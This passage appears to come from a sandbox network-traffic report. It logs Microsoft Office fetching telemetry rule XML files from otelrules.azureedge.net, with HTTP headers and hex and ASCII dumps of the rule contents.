                                                                        2024-12-03 16:50:58 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120676" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        93192.168.2.44985113.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:50:58 UTC192OUTGET /rules/rule120678v0s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:50:58 UTC470INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:50:58 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 468
                                                                        Connection: close
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                        ETag: "0x8DC582BBA642BF4"
                                                                        x-ms-request-id: 4f55dbf3-401e-005b-2250-439c0c000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165058Z-174f7845968xlwnmhC1EWR0sv8000000161000000000dt74
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:50:58 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120678" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        94192.168.2.44985213.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:50:58 UTC192OUTGET /rules/rule120679v0s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:50:58 UTC470INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:50:58 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 174
                                                                        Connection: close
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                        ETag: "0x8DC582B91D80E15"
                                                                        x-ms-request-id: 357a15c2-f01e-001f-47c7-435dc8000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165058Z-174f7845968glpgnhC1EWR7uec00000016eg000000001t1g
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:50:58 UTC174INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120679" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> </S> <T> <S T="1" /> </T></R>


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        95192.168.2.44985413.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:51:00 UTC192OUTGET /rules/rule120680v0s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:51:00 UTC494INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:51:00 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 1952
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                        ETag: "0x8DC582B956B0F3D"
                                                                        x-ms-request-id: b5b05efe-701e-0001-4ea6-43b110000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165100Z-174f7845968ljs8phC1EWRe6en0000001640000000004wu8
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:51:00 UTC1952INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 31 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120680" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <SS T="1" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> <R T="2" R="120682" /> <F T="3"> <O T="LT"> <L>


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        96192.168.2.44985513.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:51:00 UTC192OUTGET /rules/rule120681v0s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:51:00 UTC470INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:51:00 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 958
                                                                        Connection: close
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:58 GMT
                                                                        ETag: "0x8DC582BA0A31B3B"
                                                                        x-ms-request-id: 0fc8491f-a01e-0070-59ee-44573b000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165100Z-174f7845968glpgnhC1EWR7uec000000167g00000000yfdq
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:51:00 UTC958INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120681" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120608" /> <R T="2" R="120680" /> <TH T="3"> <O T="AND"> <L> <O T="EQ"> <L>


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        97192.168.2.44985613.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:51:00 UTC192OUTGET /rules/rule120682v0s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:51:01 UTC470INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:51:00 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 501
                                                                        Connection: close
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:18 GMT
                                                                        ETag: "0x8DC582BACFDAACD"
                                                                        x-ms-request-id: 4c7796e8-801e-0083-47a6-43f0ae000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165100Z-174f7845968n2hr8hC1EWR9cag00000015s000000000tyz6
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:51:01 UTC501INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 74 61 72 74 75 70 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120682" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <R T="2" R="120100" /> <SS T="3" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> </S> <C T="


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        98192.168.2.44985713.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:51:00 UTC193OUTGET /rules/rule120602v10s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:51:01 UTC494INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:51:00 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 2592
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                        ETag: "0x8DC582BB5B890DB"
                                                                        x-ms-request-id: 205353cd-201e-006e-0bb2-42bbe3000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165100Z-174f7845968jrjrxhC1EWRmmrs00000016dg000000004h56
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:51:01 UTC2592INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 32 22 20 56 3d 22 31 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 6e 64 4c 61 6e 67 75 61 67 65 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120602" V="10" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAndLanguage" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa=


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        99192.168.2.44985813.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:51:00 UTC192OUTGET /rules/rule120601v3s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:51:01 UTC494INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:51:00 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 3342
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:34 GMT
                                                                        ETag: "0x8DC582B927E47E9"
                                                                        x-ms-request-id: b8dd1d48-d01e-005a-01dc-437fd9000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165100Z-174f7845968ljs8phC1EWRe6en00000015zg00000000q86a
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:51:01 UTC3342INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 4f 53 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120601" V="3" DC="SM" EN="Office.System.SystemHealthMetadataOS" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns=""> <RI


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        100192.168.2.44985913.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:51:02 UTC193OUTGET /rules/rule224901v11s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:51:03 UTC494INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:51:02 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 2284
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:13 GMT
                                                                        ETag: "0x8DC582BCD58BEEE"
                                                                        x-ms-request-id: 23665d8e-b01e-0098-3e05-41cead000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165102Z-174f78459684bddphC1EWRbht400000015w000000000qe4e
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:51:03 UTC2284INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 31 22 20 56 3d 22 31 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4c 69 63 65 6e 73 69 6e 67 2e 4f 66 66 69 63 65 43 6c 69 65 6e 74 4c 69 63 65 6e 73 69 6e 67 2e 44 6f 4c 69 63 65 6e 73 65 56 61 6c 69 64 61 74 69 6f 6e 22 20 41 54 54 3d 22 63 31 61 30 64 62 30 31 32 37 39 36 34 36 37 34 61 30 64 36 32 66 64 65 35 61 62 30 66 65 36 32 2d 36 65 63 34 61 63 34 35 2d 63 65 62 63 2d 34 66 38 30 2d 61 61 38 33 2d 62 36 62 39 64 33 61 38 36 65 64 37 2d 37 37 31 39 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 54 3d 22 55 70 6c 6f 61 64 2d 4d 65 64 69 75 6d 22
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224901" V="11" DC="SM" EN="Office.Licensing.OfficeClientLicensing.DoLicenseValidation" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" SP="CriticalCensus" T="Upload-Medium"


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        101192.168.2.44986013.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:51:02 UTC192OUTGET /rules/rule701201v1s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:51:03 UTC494INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:51:03 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 1393
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:51 GMT
                                                                        ETag: "0x8DC582BE3E55B6E"
                                                                        x-ms-request-id: d2df421c-b01e-0021-5593-43cab7000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165103Z-174f7845968zgtf6hC1EWRqd8s0000000z1000000000xfkh
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:51:03 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml"


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        102192.168.2.44986113.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:51:02 UTC192OUTGET /rules/rule701200v1s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:51:03 UTC494INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:51:03 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 1356
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                        ETag: "0x8DC582BDC681E17"
                                                                        x-ms-request-id: 5bb85073-401e-005b-22cf-439c0c000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165103Z-174f7845968nxc96hC1EWRspw800000015x000000000ksyu
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
                                                                        2024-12-03 16:51:03 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml" S="Medium" /> <F T="2">


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        103192.168.2.44986213.107.246.63443
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-12-03 16:51:02 UTC192OUTGET /rules/rule700201v1s19.xml HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Accept-Encoding: gzip
                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                        Host: otelrules.azureedge.net
                                                                        2024-12-03 16:51:03 UTC494INHTTP/1.1 200 OK
                                                                        Date: Tue, 03 Dec 2024 16:51:03 GMT
                                                                        Content-Type: text/xml
                                                                        Content-Length: 1393
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        Cache-Control: public, max-age=604800, immutable
                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:50 GMT
                                                                        ETag: "0x8DC582BE39DFC9B"
                                                                        x-ms-request-id: fe0e881e-601e-0050-1a3a-402c9c000000
                                                                        x-ms-version: 2018-03-28
                                                                        x-azure-ref: 20241203T165103Z-174f7845968psccphC1EWRuz9s00000016hg000000002ewh
                                                                        x-fd-int-roxy-purgeid: 0
                                                                        X-Cache: TCP_HIT
                                                                        Accept-Ranges: bytes
